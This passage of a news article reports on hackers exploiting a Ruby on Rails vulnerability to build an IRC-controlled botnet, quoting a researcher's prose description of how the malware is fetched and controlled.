A critical vulnerability in the Web application development framework Ruby on Rails is being exploited by hackers to compromise servers and build a botnet.
“This vulnerability was the subject of much discussion, and an emergency RoR advisory back in January,” he said in his blog. “It’s pretty surprising that it’s taken this long to surface in the wild, but less surprising that people are still running vulnerable installations of Rails.
The exploit, he said, adds a scheduled task on Linux machines that executes a series of commands.
The commands download a malicious C source file from a remote server. The malware connects to an Internet Relay Chat server and connects to a channel where it receives commands from the attackers.
Jamoc described the exploits as a “pretty straightforward skiddy exploit.”
“Functionality is limited, but it includes the ability to download and execute files as commanded, as well as changing servers,” he said. “There’s no authentication performed, so an enterprising individual could hijack these bots fairly easily by joining the IRC server and issuing the appropriate commands.”